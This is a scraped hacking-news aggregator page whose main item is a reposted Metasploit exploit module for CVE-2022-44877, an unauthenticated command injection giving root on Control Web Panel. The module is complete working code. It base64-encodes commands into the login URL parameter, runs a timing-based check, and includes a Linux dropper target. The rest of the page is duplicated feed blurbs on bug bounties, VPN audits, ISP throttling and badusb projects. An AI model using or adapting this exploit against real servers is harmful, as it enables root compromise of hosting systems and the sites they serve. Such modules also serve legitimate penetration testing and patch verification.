Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Control Web Panel Unauthenticated Remote Command Execution
https://3.bp.blogspot.com/-nGXsE6SnJzg/WWlu_4hmLPI/AAAAAAAAIKI/Orx5Bzmw2Dg1C2Ys8CQM09j0YgXq__7zgCLcBGAs/s1600/h120.png Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
SHA-256 |
Control Web Panel Unauthenticated Remote Command Execution
https://3.bp.blogspot.com/-nGXsE6SnJzg/WWlu_4hmLPI/AAAAAAAAIKI/Orx5Bzmw2Dg1C2Ys8CQM09j0YgXq__7zgCLcBGAs/s1600/h120.png Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
SHA-256 |
00cb85e5ab25f2d5091aa8c72d9d5252d08919dce9dbd37743bea7469e5dbc51Download ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/stopwatch'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CWP login.php Unauthenticated RCE',
'Description' => %q{
Control Web Panel versions < 0.9.8.1147 are vulnerable to
unauthenticated OS command injection. Successful exploitation results
in code execution as the root user. The results of the command are not
contained within the HTTP response and the request will block while
the command is running.
},
'Author' => [
'Spencer McIntyre', # metasploit module
'Numan Türle' # vulnerability discovery
],
'References' => [
[ 'CVE', '2022-44877' ],
[ 'URL', 'https://github.com/numanturle/CVE-2022-44877' ],
[ 'URL', 'https://control-webpanel.com/changelog#1674073133745-84af1b53-c121' ]
],
'DisclosureDate' => '2023-01-05',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(2031),
OptString.new('TARGETURI', [true, 'Base path', '/login/index.php'])
])
end
def check
sleep_time = rand(5..10)
_, elapsed_time = Rex::Stopwatch.elapsed_time do
execute_command("sleep #{sleep_time}")
end
vprint_status("Elapsed time: #{elapsed_time} seconds")
unless elapsed_time > sleep_time
return CheckCode::Safe('Failed to test command injection.')
end
CheckCode::Appears('Successfully tested command injection.')
rescue Msf::Exploit::Failed
return CheckCode::Safe('Failed to test command injection.')
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
if execute_command(payload.encoded)
print_good("Successfully executed command: #{payload.encoded}")
end
when :linux_dropper
execute_cmdstager
end
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path) + "?login=$(echo${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash)",
'vars_post' => {
'username' => 'root', # *must* be root
'password' => rand_text_alphanumeric(4..16),
'commit' => 'Login'
}
)
# the command will either cause the response to timeout or return a 302
return if res.nil?
return if res.code == 302 && res.headers['Location'].include?('login=failed')
fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")
end
end Source:packetstormsecurity.comMy First Hall Of Fame with Web Cache Poisoning
https://infosecwriteups.com/my-first-hall-of-fame-with-web-cache-poisoning-c11749017cd8?source=rss------bug_bounty-5
https://infosecwriteups.com/my-first-hall-of-fame-with-web-cache-poisoning-c11749017cd8?source=rss------bug_bounty-5
Web Cache Poisoning — An Introduction | Karthikeyan NagarajContinue reading on InfoSec Write-ups » (https://infosecwriteups.com/my-first-hall-of-fame-with-web-cache-poisoning-c11749017cd8?source=rss------bug_bounty-5)
A bug that permitted bypassing of Facebook’s two-factor authentication (2FA) was discovered by a…
https://medium.com/@dkjhaj2ee/a-bug-that-permitted-bypassing-of-facebooks-two-factor-authentication-2fa-was-discovered-by-a-8ba35eca70e9?source=rss------bug_bounty-5
https://medium.com/@dkjhaj2ee/a-bug-that-permitted-bypassing-of-facebooks-two-factor-authentication-2fa-was-discovered-by-a-8ba35eca70e9?source=rss------bug_bounty-5
A flaw in a new, centralized system that Meta developed for users to manage their Facebook and Instagram logins could have made it…Continue reading on Medium » (https://medium.com/@dkjhaj2ee/a-bug-that-permitted-bypassing-of-facebooks-two-factor-authentication-2fa-was-discovered-by-a-8ba35eca70e9?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
What do you think about Surfshark's new no-log audit?
Not explicitly hacking, but hiding your trail with a VPN is part of the process, I'd argue.
So what do the naysayers think about Surfshark's proud new claim about being approved by Deloitte regarding their no-log policy?
Is it legit? Is it bull? Something else?
Article: https://surfshark.com/blog/deloitte-audit-nologs
submitted by /u/TerjiD
[link] [comments]
What do you think about Surfshark's new no-log audit?
Not explicitly hacking, but hiding your trail with a VPN is part of the process, I'd argue.
So what do the naysayers think about Surfshark's proud new claim about being approved by Deloitte regarding their no-log policy?
Is it legit? Is it bull? Something else?
Article: https://surfshark.com/blog/deloitte-audit-nologs
submitted by /u/TerjiD
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to bypass ISP throttling?
Whenever I consume 20gb per day, my ISP throttles down the speed to 1mbps, except on social media apps (tiktok, playstore, facebook, etc...) is there any method to trick the ISP into thinking the data is coming from those apps instead of lets say steam, youtube? I tried using a VPN, it doesn't work. oookla speedtest and fast.com shows the full speed, while testmy.net shows 1mbps (120kb/s) which is the true speed.
submitted by /u/HighNB
[link] [comments]
How to bypass ISP throttling?
Whenever I consume 20gb per day, my ISP throttles down the speed to 1mbps, except on social media apps (tiktok, playstore, facebook, etc...) is there any method to trick the ISP into thinking the data is coming from those apps instead of lets say steam, youtube? I tried using a VPN, it doesn't work. oookla speedtest and fast.com shows the full speed, while testmy.net shows 1mbps (120kb/s) which is the true speed.
submitted by /u/HighNB
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Any projects i could make with a Pi Pico W?
So i already made a badusb but i want to make more projects. Google wasnt really that helpful.
submitted by /u/Just_sava
[link] [comments]
Any projects i could make with a Pi Pico W?
So i already made a badusb but i want to make more projects. Google wasnt really that helpful.
submitted by /u/Just_sava
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Penetration Testing Narratives
https://cdn-images-1.medium.com/max/600/1*ZPTgeo7pU8AA1Zz6DMYX1Q.jpeg
“Tell Me you’re an Elite Pentester Without Telling Me You’re an Elite Pentester.”
Continue reading on Medium »
Penetration Testing Narratives
https://cdn-images-1.medium.com/max/600/1*ZPTgeo7pU8AA1Zz6DMYX1Q.jpeg
“Tell Me you’re an Elite Pentester Without Telling Me You’re an Elite Pentester.”
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Distributed Denial-of-Service (DDoS) Attack
Continuing blogging on cybersecurity, here’s my fifth blog on distributed denial-of-service attack. Last month I published my fourth blog…
Continue reading on Medium »
Distributed Denial-of-Service (DDoS) Attack
Continuing blogging on cybersecurity, here’s my fifth blog on distributed denial-of-service attack. Last month I published my fourth blog…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Rise of Automotive Hacking
https://cdn-images-1.medium.com/max/1600/0*_xytNUuY0CL0EdV5
By Aaron Bostick, Deputy Chief Information Security Officer, ThriveDX
Continue reading on Medium »
The Rise of Automotive Hacking
https://cdn-images-1.medium.com/max/1600/0*_xytNUuY0CL0EdV5
By Aaron Bostick, Deputy Chief Information Security Officer, ThriveDX
Continue reading on Medium »